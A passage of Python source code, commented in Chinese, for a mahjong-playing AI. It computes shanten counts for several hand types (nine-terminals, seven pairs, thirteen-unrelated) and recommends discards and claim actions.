left_num=left_num)\n # 本场次只考虑九幺的情况\n # 处理补杠和暗杠的情况\n yaojiu_num_hand = jiuyao_info[\"yaojiu_num_hand\"]\n # yaojiu_num = jiuyao_info[\"yaojiu_num\"]\n if self_turn: # 补杠 暗杠\n for i in range(len(yaojiu_num_hand)):\n if yaojiu_num_hand[i] == 1 and suits != [] and self.one_of(\n np.array([self.yaojiu_cards[i], self.yaojiu_cards[i], self.yaojiu_cards[i]]), np.array(suits)):\n return [self.yaojiu_cards[i], self.yaojiu_cards[i], self.yaojiu_cards[i], self.yaojiu_cards[i]]\n elif yaojiu_num_hand[i] == 4:\n return [self.yaojiu_cards[i], self.yaojiu_cards[i], self.yaojiu_cards[i], self.yaojiu_cards[i]]\n return []\n else:\n if op_card in self.yaojiu_cards:\n if yaojiu_num_hand[self.yaojiu_cards.index(op_card)] == 3: # 明杠\n return [op_card, op_card, op_card, op_card]\n elif yaojiu_num_hand[self.yaojiu_cards.index(op_card)] == 2 and jiuyao_info[\"xts\"] > 1: # 碰 增加填胡不再碰的情况\n return [op_card, op_card, op_card]\n else:\n return []\n else:\n return []\n\n def recommend_card(self, cards=[], suits=[], left_num=[], king_card=None):\n \"\"\"\n 出牌接口\n :param cards:手牌\n :param suits: 副露\n :param left_num: 剩余牌\n :param king_card: 宝牌\n :return: card 出牌\n \"\"\"\n jiuyao_info = self.jiuyao_info(cards=cards, suits=suits, left_num=left_num)\n # jiuyao_info[\"yaojiu_num\"]==-1:\n left_cards = jiuyao_info[\"left_cards\"]\n return self.defend_V1(left_cards=left_cards, king_card=king_card)\n\n\n# 七对牌型类\nclass qidui:\n def __init__(self):\n pass\n\n def get_cards_num(self, cards=[]):\n \"\"\"\n 获取手牌中每张牌的数量\n :param cards: 手牌\n :return: cards_unique, cards_num 去重后的手牌及其数量\n \"\"\"\n # if len(suits)!=0:\n # return\n\n cards_unique = np.unique(cards)\n cards_num = [0] * len(cards_unique)\n for i in range(len(cards_unique)):\n cards_num[i] = cards.count(cards_unique[i])\n\n return cards_unique, cards_num\n\n def qidui_info(self, cards=[], suits=[], left_num=[], king_num=0):\n \"\"\"\n 七对的相关信息{}\n 包括cards_unique 去重后的手牌\n cards_num 每张牌的数量\n duipai 对牌\n left_cards 剩余牌\n xts 向听数\n :param cards: 手牌\n :param suits: 副露\n :param left_num:剩余牌\n :param king_num: 宝牌\n :return: {} qidui_info 字典格式存储的七对信息\n \"\"\"\n qidui_info = {}\n if len(suits) != 0:\n qidui_info[\"xts\"] = 14\n return qidui_info\n\n cards_unique, cards_num = self.get_cards_num(cards=cards)\n duipai = []\n left_cards = []\n for i in range(len(cards_unique)):\n if cards_num[i] == 4:\n duipai.append(cards_unique[i])\n duipai.append(cards_unique[i])\n elif cards_num[i] == 3:\n duipai.append(cards_unique[i])\n left_cards.append(cards_unique[i])\n elif cards_num[i] == 2:\n duipai.append(cards_unique[i])\n elif cards_num[i] == 1:\n left_cards.append(cards_unique[i])\n # for card in cards_unique:\n # if\n qidui_info[\"cards_unique\"] = cards_unique\n qidui_info[\"cards_num\"] = cards_num\n qidui_info[\"duipai\"] = duipai\n qidui_info[\"left_cards\"] = left_cards\n qidui_info[\"xts\"] = 14 - (len(duipai) * 2 + 7 - len(duipai)) - king_num\n\n return qidui_info\n\n def defend_V1(self, left_cards=[], left_num=[]):\n \"\"\"\n 七对出牌决策\n 出剩余牌数量最低的牌\n :param left_cards:孤张\n :param left_num: 剩余牌数量\n :return: 最佳出牌\n \"\"\"\n discards_order = [0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x01, 0x09, 0x11, 0x19, 0x21, 0x29, 0x02, 0x08,\n 0x12, 0x18, 0x22, 0x28, 0x03, 0x07, 0x13, 0x17, 0x23, 0x27, 0x04, 0x06, 0x14, 0x16, 0x24,\n 0x26, 0x05, 0x15, 0x25]\n effective_cards_num = [0] * len(left_cards)\n for i in range(len(left_cards)):\n # print(\"qidui,\")\n effective_cards_num[i] = left_num[translate16_33(left_cards[i])]\n min_num = 4\n min_index = 0\n for i in range(len(effective_cards_num)):\n if min_num > effective_cards_num[i]:\n min_num = effective_cards_num[i] # 忘了写了\n min_index = i\n # print (\"ph.defend_V1,min_index\",min_index)\n # print(left_cards)\n if left_cards == []:\n return 0x00\n else:\n return left_cards[min_index]\n return None\n\n def recommend_card(self, cards=[], suits=[], left_num=[], king_card=None):\n \"\"\"\n 七对出牌接口\n :param cards:手牌\n :param suits: 副露\n :param left_num: 剩余牌\n :param king_card: 宝牌\n :return: 最佳出牌\n \"\"\"\n cards_copy = MJ.deepcopy(cards)\n if king_card != None:\n # cards_copy=copy.deepcopy(cards)\n king_num = cards.count(king_card)\n for i in range(king_num):\n cards_copy.remove(king_card)\n\n qidui_info = self.qidui_info(cards=cards_copy, suits=suits, left_num=left_num, king_num=king_num)\n left_cards = qidui_info[\"left_cards\"]\n return self.defend_V1(left_cards=left_cards, left_num=left_num)\n\n # 七对不考虑吃碰杠情况\n def recommend_op(self, op_card, cards=[], suits=[]):\n \"\"\"\n 七对不考虑动作决策,直接返回[]\n :param op_card: 操作牌\n :param cards: 手牌\n :param suits: 副露\n :return: []\n \"\"\"\n return []\n\n\n# 十三烂牌型类\nclass ssl:\n # todo 宝牌翻倍的\n def __init__(self, handcards, suits, discards):\n \"\"\"\n 十三烂类变量初始化\n :param handcards:手牌\n :param suits: 副露\n :param discards: 弃牌\n \"\"\"\n self.handcards = handcards\n self.suits = suits\n\n self.type = None\n\n self.discards = discards\n\n def wait_types_13(self):\n \"\"\"\n 十三浪的向听数判断,手中十四张牌中,序数牌间隔大于等于3,字牌没有重复所组成的牌形\n 先计算0x0,0x1,0x2中的牌,起始位a,则a+3最多有几个,在wait上减,0x3计算不重复最多的数\n :return: wait_num, handcardsapart, effectiveCards, entire_discards 向听数 万条筒具体拆分情况 万条筒的具体有效牌 完全废牌\n \"\"\"\n\n # numCanUsejing = 0\n tile_list = copy.copy(self.handcards)\n # numJing = 0\n wait_num = 14 # 表示向听数\n numZi = 0 # 记录字牌个数\n handcardsapart = [] # 万条筒具体拆分情况\n effectiveCards = [] # 万条筒的具体有效牌\n entire_discards = [] # 完全废牌\n\n # if jing: # 有精的话就把精给拿出来\n # for i in range(len(tile_list) - 1, -1, -1): # 有精先拿出来 用逆序查找的方法或者while的方法可以避免越界\n # if tile_list[i] == jing or tile_list[i] == fuJing: # 拿出正精和副精\n # tile_list.pop(i) # 删除精 并且精加一\n # numJing += 1\n # print(tile_list,numJing)\n if self.suits != []:\n wait_num = 14\n return wait_num, [], [], []\n else:\n L = set(tile_list) # 去除重复手牌\n L_num0 = [] # 万数牌\n L_num1 = [] # 条数牌\n L_num2 = [] # 筒数牌\n L_num3 = [] # 字牌数\n for i in L:\n if i & 0xf0 == 0x30:\n # 计算字牌的向听数\n numZi += 1\n wait_num -= 1\n if i & 0xf0 == 0x00:\n L_num0.append(i & 0x0f)\n if i & 0xf0 == 0x10:\n L_num1.append(i & 0x0f)\n if i & 0xf0 == 0x20:\n L_num2.append(i & 0x0f)\n if i & 0xf0 == 0x30:\n L_num3.append(i & 0x0f)\n # print(L_num3)\n # print(wait_num)\n if L_num0 != []:\n self.type = 0\n # print (\"L_num0=\",L_num0)\n a, b, c, d = self.calculate_13(L_num0) # 减去万数牌的向听数\n # print (a,b,c)\n wait_num -= a\n handcardsapart.append(b)\n effectiveCards.append(c)\n entire_discards.extend(d)\n else:\n handcardsapart.append([])\n effectiveCards.append([])\n if L_num1 != []:\n self.type = 1\n a, b, c, d = self.calculate_13(L_num1) # 减去条数牌的向听数\n wait_num -= a\n handcardsapart.append(b)\n effectiveCards.append(c)\n entire_discards.extend([e + 16 for e in d])\n else:\n handcardsapart.append([])\n effectiveCards.append([])\n if L_num2 != []:\n self.type = 2\n a, b, c, d = self.calculate_13(L_num2) # 减去筒数牌的向听数\n wait_num -= a\n handcardsapart.append(b)\n effectiveCards.append(c)\n entire_discards.extend([e + 32 for e in d])\n else:\n handcardsapart.append([])\n effectiveCards.append([])\n if L_num3 != []:\n self.type = 3\n c = self.getzieffectiveCards(L_num3)\n handcardsapart.append(L_num3)\n effectiveCards.append(c)\n else:\n handcardsapart.append([])\n effectiveCards.append([])\n\n return wait_num, handcardsapart, effectiveCards, entire_discards\n\n def calculate_13(self, tiles): # 返回 向听数,手牌情况,有效牌\n \"\"\"\n 计算十三烂中各花色的向听数,拆分情况,有效牌,完全废牌\n :param tiles: 某一花色的手牌\n :return: wait_num, handcardsapart, effectiveCards, entire_discards 向听数 万条筒具体拆分情况 万条筒的具体有效牌 完全废牌\n \"\"\"\n # 计算十三浪的数牌最大向听数\n waitnumMax1 = max((tiles.count(1) + tiles.count(4) + tiles.count(7)),\n (tiles.count(1) + tiles.count(4) + tiles.count(8)),\n (tiles.count(1) + tiles.count(4) + tiles.count(9)),\n (tiles.count(1) + tiles.count(5) + tiles.count(8)),\n (tiles.count(1) + tiles.count(5) + tiles.count(9)),\n (tiles.count(1) + tiles.count(6) + tiles.count(9)),\n (tiles.count(2) + tiles.count(5) + tiles.count(8)),\n (tiles.count(2) + tiles.count(5) + tiles.count(9)),\n (tiles.count(2) + tiles.count(6) + tiles.count(9)),\n (tiles.count(3) + tiles.count(6) + tiles.count(9)))\n waitnumMax2 = max((tiles.count(2) + tiles.count(7)), (tiles.count(3) + tiles.count(7)),\n (tiles.count(3) + tiles.count(8)), )\n ssl_table = [[1, 6, 9], [1, 4, 9], [1, 4, 7], [1, 4, 8], [1, 5, 9], [1, 5, 8], [2, 5, 9], [2, 5, 8], [3, 6, 9],\n [2, 6, 9]]\n if max(waitnumMax1, waitnumMax2) == 3: # 当向听数为3 的时候 直接返回3,无有效牌\n handcardapart = [] # 手牌拆分情况\n # for i in range(len(tiles) - 2):\n # if tiles[i + 1] - tiles[i] >= 3 and tiles[i + 2] - tiles[i + 1] >= 3:\n #\n # handcardapart = [tiles[i], tiles[i + 1], tiles[i + 2]]\n # break\n # print(\"ssl,tiles=\",tiles)\n entire_discards = [] # 完全废牌\n for i in ssl_table:\n if i[0] in tiles and i[1] in tiles and i[2] in tiles:\n # print(\"i=\",i)\n handcardapart = i\n tmp = copy.copy(tiles)\n tmp.remove(i[0])\n tmp.remove(i[1])\n tmp.remove(i[2])\n entire_discards = tmp\n break\n return 3, handcardapart, [], entire_discards\n elif max(waitnumMax1, waitnumMax2) == 2: # 当向听数为2 的时候 返回向听数\n youxiao, entire_discards = self.geteffectiveCards(tiles)\n return 2, youxiao[0], youxiao[1], entire_discards\n elif max(waitnumMax1, waitnumMax2) == 1: # 当向听数只有1 的时候\n # 20190411.12.18 修正向听数为1的情况\n effective_cards = []\n ssl_one_list = [1, 9, 2, 8, 3, 7, 4, 6, 5]\n ssl_one_efc = [[4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6], [5, 6, 7, 8, 9], [1, 2, 3, 4, 5], [6, 7, 8, 9],\n [1, 2, 3, 4], [1, 7, 8, 9], [1, 2, 3, 9], [1, 2, 8, 9]]\n for i in range(len(ssl_one_list)):\n if ssl_one_list[i] in tiles:\n return 1, [ssl_one_list[i]], ssl_one_efc[i], []\n # 没有这种花色时的情况\n return 0, [], [1, 2, 3, 4, 5, 6, 7, 8, 9], []\n\n @staticmethod\n def getTable():\n \"\"\"\n 建十三烂的表(每个元素:【【牌型】,【有效牌集合】,有效牌个数】)\n :return: 十三烂的表\n \"\"\"\n table = [[[1, 4], [7, 8, 9], 3], [[1, 5], [8, 9], 2], [[1, 6], [9], 1], [[1, 7], [4], 1], [[1, 8], [4, 5], 2],\n [[1, 9], [4, 5, 6], 3], [[2, 5], [8, 9], 2], [[2, 6], [9], 1], [[2, 7], [], 0], [[2, 8], [5], 1],\n [[2, 9], [5, 6], 2], [[3, 6], [9], 1], [[3, 7], [], 0], [[3, 8], [], 0], [[3, 9], [6], 1],\n [[4, 7], [1], 1], [[4, 8], [1], 1], [[4, 9], [1], 1], [[5, 8], [1, 2], 2], [[5, 9], [1, 2], 2],\n [[6, 9], [1, 2, 3], 3]]\n return table\n\n @staticmethod\n def get2N(cards=[]):\n \"\"\"\n 计算十三烂万条筒花色的搭子集合及剩余牌\n :param cards: 某一类非字牌\n :return: 所有可能的搭子\n \"\"\"\n all2N = [] # 2N\n left_cards = [] # 废牌\n for i in cards:\n for j in range(i + 3, 10, 1): # 20190411修改,9改10\n if j in cards:\n all2N.append([i, j])\n # 添加废牌\n tmp = copy.copy(cards)\n tmp.remove(i)\n tmp.remove(j)\n left_cards.extend(tmp) # all2N[1].append()\n return all2N, left_cards\n\n def geteffectiveCards(self, cards):\n \"\"\"\n 当某一花色的十三烂牌的有用牌为2张时,获取有效牌数量最多的拆分组合\n 获取万条筒的手牌分布情况,有效牌分布,有效牌的实际个数(非字牌)\n :param cards: 某一花色的手牌\n :return: effective 手牌情况,有效牌,有效牌实际个数, entire_discards 完全废牌\n \"\"\"\n effective = [[], [], 0] # 手牌情况,有效牌,有效牌实际个数\n entire_discards = [] # 完全废牌\n all2N, left_cards = self.get2N(cards) # 获取当前手牌所有2N\n for card in left_cards:\n if left_cards.count(card) == len(left_cards):\n entire_discards.append(card)\n ssl2NTable = self.getTable() # 获取十三烂2N表\n for two2N in ssl2NTable:\n if two2N[0] in all2N: # 如果手牌里的2N与库里的相同\n if self.getEffectiveNum(two2N[1]) >= effective[2]: # 如果当前有效牌多于有效牌\n effective[1] = two2N[1] # 当前有效牌赋给有效牌\n effective[0] = two2N[0] # 把当前手牌情况放进去\n effective[2] = self.getEffectiveNum(two2N[1])\n # print (\"ssl.geteffectiveCards=\",effective)\n return effective, entire_discards\n\n def getzieffectiveCards(self, cards):\n \"\"\"\n 获取字牌的有效牌\n :param cards:字牌\n :return: 字牌的有效牌\n \"\"\"\n effectivecards = []\n allZi = [1, 2, 3, 4, 5, 6, 7]\n for i in allZi:\n if i not in cards:\n effectivecards.append(i)\n return effectivecards\n\n def translate(self, op_card, type):\n \"\"\"\n 个位数和type转换到 0-33 /34转换\n :param op_card: 操作牌\n :param type:花色\n :return: 0-33索引\n \"\"\"\n if type == 0: # 万字1-9对应 0-8\n return op_card - 1\n elif type == 1: # 条字1-9对应 9-17\n return op_card - 1 + 9\n elif type == 2: # 筒字1-9 对应18-26\n return op_card - 1 + 18\n elif type == 3: # 字牌1-7 对应 27 - 33\n return op_card - 1 + 27\n\n def translate2(self, i): # 1-34转换到16进制的card\n \"\"\"\n 将1-34转化为牌值\n :param i:\n :return:\n \"\"\"\n if i >= 10 and i <= 18:\n i = i + 7\n elif i >= 19 and i <= 27:\n i = i + 14\n elif i >= 28 and i <= 34:\n i = i + 21\n return i\n\n def getEffectiveNum(self, effectiveCards):\n \"\"\"\n 获取有效牌的数量\n 输入effectiveCards有效牌集合,返回有效牌数量\n :param effectiveCards: 有效牌集合\n :return: 有效牌数量\n \"\"\"\n Numeffective = len(effectiveCards) * 4\n for eC in effectiveCards:\n Numeffective -= self.discards[\n self.translate(eC, self.type)] # 减去弃牌表中的有效牌 # Numeffective -= self.handcards.count(eC) # 减去手牌中的有效牌\n return Numeffective\n\n def ssl_info(self, left_num=[]):\n \"\"\"\n 十三烂信息\n :param left_num:有效牌数量\n :return: {} 字典格式存储的十三烂信息\n \"\"\"\n ssl_info = {}\n # print(\"ssl,wait_types_13=\",self.wait_types_13())\n # effctive_cards=[[],[],[],[]]每种花色的有效牌,万条筒取值为1-9,字为1-7\n xts, split_cards_, effective_cards, entire_discards = self.wait_types_13()\n # print(\"ssl,split_cards_=\",split_cards_)\n if xts == 14:\n ssl_info[\"xts\"] = xts\n return ssl_info\n split_cards = []\n # print (split_cards)\n split_cards.append(split_cards_[0])\n split_cards.append([e + 16 for e in split_cards_[1]])\n split_cards.append([e + 32 for e in split_cards_[2]])\n split_cards.append([e + 48 for e in split_cards_[3]])\n left_cards = copy.copy(self.handcards)\n # print(\"ssl_info,split_cards=\",split_cards)\n for s_cards in split_cards:\n for card in s_cards:\n left_cards.remove(card)\n\n ssl_info[\"xts\"] = xts # 向听数\n ssl_info[\"split_cards\"] = split_cards # 有用的十三烂牌\n ssl_info[\"effective_cards\"] = effective_cards # 有效牌\n ssl_info[\"left_cards\"] = left_cards # 去除十三烂后的剩余牌\n ssl_info[\"entire_discards\"] = entire_discards # 完全废牌\n\n return ssl_info\n\n def defend_V1(self, left_cards, entire_discards):\n \"\"\"\n 十三烂出牌策略\n 按出牌次序discards_order 直接出废牌\n :param left_cards: 剩余牌\n :param entire_discards: 完全废牌\n :return: 最佳出牌\n \"\"\"\n # print(\"ssl,defend_V1,left_cards=\",left_cards)\n discards_order = [0x03, 0x07, 0x13, 0x17, 0x23, 0x27, 0x04, 0x06, 0x14, 0x16, 0x24, 0x26, 0x02, 0x08, 0x12,\n 0x18, 0x22, 0x28, 0x05, 0x15, 0x25, 0x01, 0x09, 0x11, 0x19, 0x21, 0x29, # 留91,可能会转牌型\n 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37]\n # 先出完全废牌\n for card in discards_order:\n if card in entire_discards:\n return card\n # 先出aa\n for card in left_cards:\n if self.handcards.count(card) >= 2:\n return card\n for card in discards_order:\n if card in left_cards:\n return card\n\n def recommend_card(self, ):\n \"\"\"\n 十三烂出牌接口\n :return: 最佳出牌\n \"\"\"\n ssl_info = self.ssl_info()\n return self.defend_V1(ssl_info[\"left_cards\"], ssl_info[\"entire_discards\"])\n\n def recommend_op(self):\n \"\"\"\n 十三烂动作接口\n 十三烂不考虑动作操作\n :return: []\n \"\"\"\n return []\n\n\ndef translate16_33(i):\n \"\"\"\n 将牌值16进制转化为0-33的下标索引\n :param i: 牌值\n :return: 数组下标\n \"\"\"\n i = int(i)\n if i >= 0x01 and i <= 0x09:\n i = i - 1\n elif i >= 0x11 and i <= 0x19:\n i = i - 8\n elif i >= 0x21 and i <= 0x29:\n i = i - 15\n elif i >= 0x31 and i <= 0x37:\n i = i - 22\n else:\n # i=1/0\n # print(\"translate16_33 is error,i=%d\" % i)\n i = -1\n return i\n\n\ndef convert_hex2index(a):\n \"\"\"\n 将牌值16进制转化为0-33的下标索引\n :param a: 牌\n :return: 数组下标\n \"\"\"\n if a > 0 and a < 0x10:\n return a - 1\n if a > 0x10 and a < 0x20:\n return a - 8\n if a > 0x20 and a < 0x30:\n return a - 15\n if a > 0x30 and a < 0x40:\n return a - 22\n\n\ndef trandfer_discards(discards, discards_op, handcards):\n \"\"\"\n 获取场面剩余牌��量\n 计算手牌和场面牌的数量,再计算未知牌的数量\n :param discards: 弃牌\n :param discards_op: 场面副露\n :param handcards: 手牌\n :return: left_num, discards_list 剩余牌列表,已出现的牌数量列表\n \"\"\"\n discards_map = {0x01: 0, 0x02: 1, 0x03: 2, 0x04: 3, 0x05: 4, 0x06: 5, 0x07: 6, 0x08: 7, 0x09: 8, 0x11: 9, 0x12: 10,\n 0x13: 11, 0x14: 12, 0x15: 13, 0x16: 14, 0x17: 15, 0x18: 16, 0x19: 17, 0x21: 18, 0x22: 19, 0x23: 20,\n 0x24: 21, 0x25: 22, 0x26: 23, 0x27: 24, 0x28: 25, 0x29: 26, 0x31: 27, 0x32: 28, 0x33: 29, 0x34: 30,\n 0x35: 31, 0x36: 32, 0x37: 33, }\n # print (\"discards=\",discards)\n # print (\"discards_op=\",discards_op)\n left_num = [4] * 34\n discards_list = [0] * 34\n for per in discards:\n for item in per:\n discards_list[discards_map[item]] += 1\n left_num[discards_map[item]] -= 1\n for seat_op in discards_op:\n for op in seat_op:\n for item in op:\n discards_list[discards_map[item]] += 1\n left_num[discards_map[item]] -= 1\n for item in handcards:\n left_num[discards_map[item]] -= 1\n\n # print (\"trandfer_discards,left_num=\",left_num)\n return left_num, discards_list\n\n\n# 获取list中的最小值和下标\ndef get_min(list=[]):\n \"\"\"\n 获取最小xts的下标\n :param list: 向听数列表\n :return: 返回最小向听数及其下标\n \"\"\"\n min = 14\n index = 0\n for i in range(len(list)):\n if list[i] < min:\n min = list[i]\n index = i\n return min, index\n\n\ndef paixing_choose(cards=[], suits=[], king_card=None, discards=[], discards_op=[], op_card=None, fei_king=0):\n \"\"\"\n 牌型选择\n 通过计算向听数来判断\n :param cards: 手牌\n :param suits: 副露\n :param king_card:宝牌\n :param discards: 弃牌\n :param discards_op: 场面副露\n :param op_card: 操作牌\n :param fei_king: 飞宝数\n :return: 牌型序号 0为平胡 1 为九幺 2七对 3十三烂\n \"\"\"\n left_num, discards_list = trandfer_discards(discards=discards, discards_op=discards_op, handcards=cards)\n\n # king_num = 0\n if king_card is not None:\n # left_num[translate16_33(king_card)] = 0\n left_num[translate16_33(pre_king(king_card))] -= 1\n out_king_cards = copy.copy(cards)\n king_num = cards.count(king_card)\n for i in range(king_num):\n out_king_cards.remove(king_card)\n # xts, t3N, suits, t2N, [aa, ab, ac], left_cards, effctive_cards, split_cards, w,split_len=pinghu().sys_info()\n # 0, 1 , 2, 3, 4, 5, 6, 7 , 8 9\n cards_op = copy.copy(cards)\n out_king_cards_op = copy.copy(out_king_cards)\n if op_card != None:\n cards_op.append(op_card)\n out_king_cards_op.append(op_card)\n pinghu_info = pinghu(cards_op, suits, leftNum=left_num, discards=discards, discards_real=[], discardsOp=discards_op,\n round=0, remainNum=sum(left_num), seat_id=0, kingCard=king_card, fei_king=fei_king,\n op_card=op_card).sys_info_V3(cards=cards_op, suits=suits, left_num=left_num,\n kingCard=king_card)\n jiuyao_info = jiuyao().jiuyao_info(cards=cards, suits=suits, left_num=left_num)\n qidui_info = qidui().qidui_info(cards=out_king_cards, suits=suits, left_num=left_num, king_num=king_num)\n ssl_info = ssl(cards, suits, discards_list).ssl_info()\n # print (\"[pinghu_info[0],jiuyao_info[0],qidui_info[0],ssl_info[0]]=\",\n # [pinghu_info[0][4], jiuyao_info[\"xts\"], qidui_info[\"xts\"], ssl_info[\"xts\"]])\n # if ssl_info[\"xts\"]!=14 and len(ssl_info[\"split_cards\"][3])<=4:\n # ssl_w=2\n # else:\n # ssl_w=1\n # print 2\n min, index = get_min(list=[pinghu_info[0][4], jiuyao_info[\"xts\"] - 2, qidui_info[\"xts\"] + 1, ssl_info[\"xts\"] + 1])\n return index\n\n\ndef pre_king(king_card=None):\n \"\"\"\n 计算宝牌的前一张\n :param king_card: 宝牌\n :return:宝牌的前一张牌\n \"\"\"\n if king_card == None:\n return None\n if king_card == 0x01:\n return 0x09\n elif king_card == 0x11:\n return 0x19\n elif king_card == 0x21:\n return 0x29\n elif king_card == 0x31:\n return 0x37\n else:\n return king_card - 1\n\n\ndef recommend_card(cards=[], suits=[], king_card=None, discards=[], discards_op=[], fei_king=0, remain_num=136,\n round=0, seat_id=0):\n \"\"\"\n 功能:推荐出牌接口\n 思路:使用向听数作为牌型选择依据,对最小xts的牌型,再调用相应的牌型类出牌决策\n :param cards: 手牌\n :param suits: 副露\n :param king_card: 宝牌\n :param discards: 弃牌\n :param discards_op: 场面副露\n :param fei_king: 飞宝数\n :param remain_num: 剩余牌\n :return: outCard 推荐出牌\n \"\"\"\n # logger.info(\"recommond card start...\")\n # 更新全局变量\n global T_SELFMO, LEFT_NUM, t2tot3_dict, t1tot3_dict, TIME_START, RT1, RT2, RT3, ROUND\n ROUND = round\n MJ.KING = king_card\n TIME_START = time.time()\n LEFT_NUM, discards_list = trandfer_discards(discards=discards, discards_op=discards_op, handcards=cards)\n LEFT_NUM[translate16_33(pre_king(king_card))] -= 1\n # LEFT_NUM[MJ.convert_hex2index(king_card)] *= 0.25 #宝牌获取到的概率/4\n # for i in range(len(LEFT_NUM)):\n # if LEFT_NUM[i]==4:\n # LEFT_NUM[i]-=0.5\n # elif LEFT_NUM[i]==3:\n # LEFT_NUM[i]-=0.2\n # elif LEFT_NUM[i]==2:\n # LEFT_NUM[i]-=0.1\n # remain_num = min(40, sum(LEFT_NUM))\n # print remain_num\n # remain_num = 40\n # remain_num = sum(LEFT_NUM)\n # if remain_num == 0 or remain_num==136:\n # remain_num = sum(LEFT_NUM)\n\n if round < 100:\n T_SELFMO = [float(i) / remain_num for i in LEFT_NUM]\n RT1 = []\n RT2 = []\n RT3 = []\n else:\n # 当round>=8时,使用对手建模\n # cards, suits, king_card, fei_king, discards, discardsOp, discardsReal, round, seat_id, xts_round, M\n _, T_SELFMO, RT1, RT2, RT3 = DFM.DefendModel(cards=cards, suits=suits, king_card=king_card, fei_king=fei_king,\n discards=discards, discardsOp=discards_op, discardsReal=discards,\n round=round, seat_id=seat_id, xts_round=DFM.xts_round,\n M=250).getWTandRT()\n # RT1 = []\n # RT2 = []\n # RT3 = []\n # t1tot2_dict = MJ.t1tot2_info(T_selfmo=T_SELFMO)\n\n t1tot3_dict = MJ.t1tot3_info(T_selfmo=T_SELFMO, RT1=[], RT2=[], RT3=[])\n t2tot3_dict = MJ.t2tot3_info(T_selfmo=T_SELFMO, RT1=[], RT2=[], RT3=[])\n\n # print t1tot3_dict\n # print t2tot3_dict\n left_num = LEFT_NUM\n paixing = paixing_choose(cards=cards, suits=suits, king_card=king_card, discards=discards, discards_op=discards_op,\n fei_king=fei_king)\n if remain_num == 136:\n remain_num = sum(LEFT_NUM)\n if paixing == 0:\n # print(\"choose pinghu\")\n # start=time.time()\n recommond_card = pinghu(cards, suits, leftNum=left_num, discards=discards, discards_real=[],\n discardsOp=discards_op,\n round=round, remainNum=remain_num, seat_id=0, kingCard=king_card,\n fei_king=fei_king).recommend_card()\n end = time.time()\n if end - TIME_START > 3:\n pass\n # logger.error(\"overtime %s,%s,%s,%s\", end - TIME_START, cards, suits, king_card)\n return recommond_card\n elif paixing == 1:\n # print(\"choose jiuyao\")\n return jiuyao().recommend_card(cards=cards, suits=suits, left_num=left_num)\n elif paixing == 2:\n # print(\"choose qidui\")\n return qidui().recommend_card(cards=cards, suits=suits, left_num=left_num, king_card=king_card)\n elif paixing == 3:\n # print(\"choose ssl\")\n return ssl(cards, suits, discards_list).recommend_card()\n\n\ndef recommend_card_rf(cards=[], suits=[], king_card=None, discards=[], discards_op=[], fei_king=0, remain_num=136,\n round=0, seat_id=0):\n \"\"\"\n 功能:推荐出牌接口\n 思路:使用向听数作为牌型选择依据,对最小xts的牌型,再调用相应的牌型类出牌决策\n :param cards: 手牌\n :param suits: 副露\n :param king_card: 宝牌\n :param discards: 弃牌\n :param discards_op: 场面副露\n :param fei_king: 飞宝数\n :param remain_num: 剩余牌\n :return: outCard 推荐出牌\n \"\"\"\n # logger.info(\"recommond card start...\")\n # 更新全局变量\n global T_SELFMO, LEFT_NUM, t2tot3_dict, t1tot3_dict, TIME_START, RT1, RT2, RT3, ROUND\n ROUND = round\n MJ.KING = king_card\n TIME_START = time.time()\n LEFT_NUM, discards_list = trandfer_discards(discards=discards, discards_op=discards_op, handcards=cards)\n LEFT_NUM[translate16_33(pre_king(king_card))] -= 1\n # LEFT_NUM[MJ.convert_hex2index(king_card)] *= 0.25 #宝牌获取到的概率/4\n # for i in range(len(LEFT_NUM)):\n # if LEFT_NUM[i]==4:\n # LEFT_NUM[i]-=0.5\n # elif LEFT_NUM[i]==3:\n # LEFT_NUM[i]-=0.2\n # elif LEFT_NUM[i]==2:\n # LEFT_NUM[i]-=0.1\n # remain_num = min(40, sum(LEFT_NUM))\n # print remain_num\n # remain_num = 40\n # remain_num = sum(LEFT_NUM)\n # if remain_num == 0 or remain_num==136:\n # remain_num = sum(LEFT_NUM)\n\n if round < 100:\n T_SELFMO = [float(i) / remain_num for i in LEFT_NUM]\n RT1 = []\n RT2 = []\n RT3 = []\n else:\n # 当round>=8时,使用对手建模\n # cards, suits, king_card, fei_king, discards, discardsOp, discardsReal, round, seat_id, xts_round, M\n _, T_SELFMO, RT1, RT2, RT3 = DFM.DefendModel(cards=cards, suits=suits, king_card=king_card, fei_king=fei_king,\n discards=discards, discardsOp=discards_op, discardsReal=discards,\n round=round, seat_id=seat_id, xts_round=DFM.xts_round,\n M=250).getWTandRT()\n # RT1 = []\n # RT2 = []\n # RT3 = []\n # t1tot2_dict = MJ.t1tot2_info(T_selfmo=T_SELFMO)\n\n t1tot3_dict = MJ.t1tot3_info(T_selfmo=T_SELFMO, RT1=[], RT2=[], RT3=[])\n t2tot3_dict = MJ.t2tot3_info(T_selfmo=T_SELFMO, RT1=[], RT2=[], RT3=[])\n\n # print t1tot3_dict\n # print t2tot3_dict\n left_num = LEFT_NUM\n paixing = paixing_choose(cards=cards, suits=suits, king_card=king_card, discards=discards, discards_op=discards_op,\n fei_king=fei_king)\n if remain_num == 136:\n remain_num = sum(LEFT_NUM)\n if paixing == 0:\n # print(\"choose pinghu\")\n # start=time.time()\n discard, score, state = pinghu(cards, suits, leftNum=left_num, discards=discards, discards_real=[],\n discardsOp=discards_op,\n round=round, remainNum=remain_num, seat_id=0, kingCard=king_card,\n fei_king=fei_king).rf_info()\n return paixing, discard, score, state\n # end = time.time()\n # end = time.time()\n # if end - TIME_START > 3:\n # logger.error(\"overtime %s,%s,%s,%s\", end - TIME_START, cards, suits, king_card)\n # return recommond_card\n elif paixing == 1:\n # print(\"choose jiuyao\")\n return paixing, jiuyao().recommend_card(cards=cards, suits=suits, left_num=left_num), [], []\n elif paixing == 2:\n # print(\"choose qidui\")\n return paixing, qidui().recommend_card(cards=cards, suits=suits, left_num=left_num, king_card=king_card), [], []\n elif paixing == 3:\n # print(\"choose ssl\")\n return paixing, ssl(cards, suits, discards_list).recommend_card(), [], []\n\n\ndef recommend_op(op_card, cards=[], suits=[], king_card=None, discards=[], discards_op=[], canchi=False,\n self_turn=False, fei_king=0, isHu=False, round=0):\n \"\"\"\n 功能:动作决策接口\n 思路:使用向听数作为牌型选择依据,对最小xts的牌型,再调用相应的牌型类动作决策\n :param op_card: 操作牌\n :param cards: 手牌\n :param suits: 副露\n :param king_card: 